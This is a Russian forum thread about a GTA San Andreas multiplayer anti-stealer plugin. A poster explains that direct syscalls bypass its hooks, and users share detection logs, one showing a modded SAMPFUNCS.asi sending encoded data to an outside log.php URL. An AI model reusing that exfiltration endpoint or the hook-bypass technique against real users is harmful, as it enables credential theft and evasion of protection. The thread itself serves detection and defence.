Terratomorf
Известный
- 315
- 58
Эксклюзив Неактуально Избранное ASI AntiStealer
- Автор темы DarkP1xel
- Дата начала
-
- Теги
- antistealer asi
- Статус
@DarkP1xel В антистиллере есть критическая уязвимость с системными вызовами а.к.а syscall / вызов шлюза на х86.
С их помощью можно вызывать функционал ядра системы в обход всех нынче существующих хуков, даже тех что в ntdll.dll
Рекомендую использовать syscall хуки, если память не изменяет то на х86 архитектуре для этого предназначена KiFastSystemCall (win xp / win 7).
А вот на более новые не помню, там что-то связанное с этим названием было но оно разное под х64 и х86.
Хочу добавить что мой предыдущий обход который ты нихуя и не пофиксил, как раз таки окончательно фиксится хуками системных вызовов)
Так же этот же хук пофиксит обход предложенный @Rinat_Namazov через ProxyDLL.
Это конечная цепочка в вызовах с UserMode, прямой доступ в ядро системы. (На этот раз без наёба? :thinking:)
С их помощью можно вызывать функционал ядра системы в обход всех нынче существующих хуков, даже тех что в ntdll.dll
Рекомендую использовать syscall хуки, если память не изменяет то на х86 архитектуре для этого предназначена KiFastSystemCall (win xp / win 7).
А вот на более новые не помню, там что-то связанное с этим названием было но оно разное под х64 и х86.
Хочу добавить что мой предыдущий обход который ты нихуя и не пофиксил, как раз таки окончательно фиксится хуками системных вызовов)
Так же этот же хук пофиксит обход предложенный @Rinat_Namazov через ProxyDLL.
Это конечная цепочка в вызовах с UserMode, прямой доступ в ядро системы. (На этот раз без наёба? :thinking:)
Последнее редактирование:
А должен?) Фипу тоже нужно покушать, пусть майнеры качает.
DarkP1xel, а Ваш !0AntiStealerByDarkP1xel защищает от Trojan_Miner или TrojanPSW?
Заранее спасибо за ответ!
Заранее спасибо за ответ!
Не юзаю ни эту, ни предыдущую версию, так как баг с Shadow Play не пофикшен.
Если еще не в курсе, то с этим АС шадик не работает в гта. Чтобы заработал, приходится каждый раз после запуска игры сворачивать ее и разворачивать. И только так все начинает работать.
Если еще не в курсе, то с этим АС шадик не работает в гта. Чтобы заработал, приходится каждый раз после запуска игры сворачивать ее и разворачивать. И только так все начинает работать.
у меня нету файла LOG или где он должен появитьсяИ что? Ловится твой файл.
[PATCHED] > [ShellExecuteA] > [D:\Games\GTA San Andreas WINTER\d3d9.dll] > {lpFile: Mod s0beit OverLight v4 beta 3 | Mod OverLight(http://modoverlight.altervista.org/mod-s0beit-overlight-v4-beta-3/) | lpDirectory: -}
Это нормально?
Это нормально?
- 3,635
- 4,982
Что скажете?
[PATCHED] > [FindWindowA] > [D:\GTA San Andreas\SAMPFUNCS\WarningsByRaymond.sf] > {lpClassName: - | lpWindowName: GTA:SA:MP}
[PATCHED] > [FindWindowA] > [D:\GTA San Andreas\SAMPFUNCS\WarningsByRaymond.sf] > {lpClassName: - | lpWindowName: GTA:SA:MP}
Эт' норм?
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [URLDownloadToFileA] > [E:\90K EDITION BY DAPO SHOW\SAMPFUNCS.asi] > {szURL: http://op.bitq.eu/op-hax/log.php?A=ادحا&B=؛چگ‘ ²–&C=&D=خبةرجحرجبرجبإبببب&E=حدخارخحدةكك×ڑŒإخجةة‡بةاضكك'گوٌGّôû | szFileName: E:\90K EDITION BY DAPO SHOW\log.php}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\SYSTEM32\urlmon.dll] > {szURL: http://op.bitq.eu/op-hax/log.php?A=
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [gethostbyname] > [E:\90K EDITION BY DAPO SHOW\samp.dll] > {name: User}
[WARNING] > [URLDownloadToFileA] > [E:\90K EDITION BY DAPO SHOW\SAMPFUNCS.asi] > {szURL: http://op.bitq.eu/op-hax/log.php?A=ادحا&B=؛چگ‘ ²–&C=&D=خبةرجحرجبرجبإبببب&E=حدخارخحدةكك×ڑŒإخجةة‡بةاضكك'گوٌGّôû | szFileName: E:\90K EDITION BY DAPO SHOW\log.php}
[WARNING] > [URLDownloadToFileW] > [C:\Windows\SYSTEM32\urlmon.dll] > {szURL: http://op.bitq.eu/op-hax/log.php?A=
DGAYE
Новичок
- 18
- 1
AlfacH
Известный
- 111
- 24
[PATCHED] > [FindWindowA] > [C:\WINDOWS\system32\nvspcap.dll] > {lpClassName: - | lpWindowName: NVIDIA GeForce Overlay}
- Статус
Похожие темы
-
- Закрыта
- Закреплено
- Вопрос
